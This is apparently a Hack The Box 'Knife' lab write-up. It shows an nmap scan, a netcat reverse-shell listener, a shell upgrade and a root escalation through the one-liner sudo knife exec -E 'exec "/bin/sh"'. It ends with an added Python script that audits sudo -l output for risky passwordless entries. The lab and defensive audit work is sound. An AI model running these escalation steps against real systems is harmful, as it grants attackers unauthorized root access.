neoh main ~/HTB/knife sudo nmap -sSCV -p- -T4 10.10.10.242 -oN nmap.md
[sudo] password for neoh:
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-14 21:10 EST
Nmap scan report for 10.10.10.242
Host is up (0.025s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.82 seconds

Nmap reveals SSH on port 22 and a website on port 80.

I found a nice exploit on GitHub that will provide a reverse shell. Let’s start a listener.

neoh main ~ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.10.242 52250
bash: cannot set terminal process group (969): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
james@knife:/$ export TERM=xterm
export TERM=xterm
james@knife:/$

Time for escalation. Enumeration didn’t take long 😉
james@knife:/$ sudo -l
sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

This should be fairly easy!
james@knife:/$ sudo knife exec -E 'exec "/bin/sh"'
sudo knife exec -E 'exec "/bin/sh"'
# whoami
whoami
root

Done!!! Rooted!
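As an added defender-side example (not part of the original writeup): a small Python audit that parses `sudo -l` output in the format shown above and flags passwordless root entries whose command is ALL or an unrestricted binary that can evaluate code, knife being the one from this box. The set of such binaries and the second, argument-restricted sample line are assumptions for the demo.

```python
import re

# Binaries that evaluate arbitrary code when given the right subcommand; knife
# is the one from this box ("knife exec -E" runs Ruby). Assumed set for the demo.
CODE_EXEC_BINS = {"knife"}

# One privilege line of `sudo -l`: "(runas) TAG: TAG: cmd1, cmd2"
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

# Constructed sample: the first privilege line is the one from the box; the second
# is an added variant that pins arguments, so in sudoers it only matches that exact
# command line and "knife exec" is not reachable through it.
SAMPLE = r"""Matching Defaults entries for james on knife:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife
    (root) NOPASSWD: /usr/bin/knife node list
"""

def parse_sudo_l(output: str) -> list[dict]:
    """Return the privilege entries listed under 'User X may run the following commands'."""
    entries, in_block = [], False
    for line in output.splitlines():
        if line.startswith("User ") and "may run the following commands" in line:
            in_block = True
            continue
        m = ENTRY_RE.match(line) if in_block else None
        if not m:
            continue
        runas = m.group("runas").split(":")[0].strip()           # "(root)" or "(ALL : ALL)"
        tags = {t.rstrip(":") for t in m.group("tags").split()}  # e.g. {"NOPASSWD"}
        for cmd in m.group("cmds").split(","):
            entries.append({"runas": runas, "tags": tags, "command": cmd.strip()})
    return entries

def risky_entries(entries: list[dict]) -> list[str]:
    """Flag passwordless root entries that are ALL or an unrestricted code-executing binary."""
    flagged = []
    for e in entries:
        if e["runas"] not in ("root", "ALL") or "NOPASSWD" not in e["tags"]:
            continue
        words = e["command"].split()
        binary = words[0].rsplit("/", 1)[-1]
        if e["command"] == "ALL" or (binary in CODE_EXEC_BINS and len(words) == 1):
            flagged.append(e["command"])
    return flagged
```

Feed it the output of `sudo -l -U <user>` from a host audit and each flagged command is a sudoers entry worth tightening or removing.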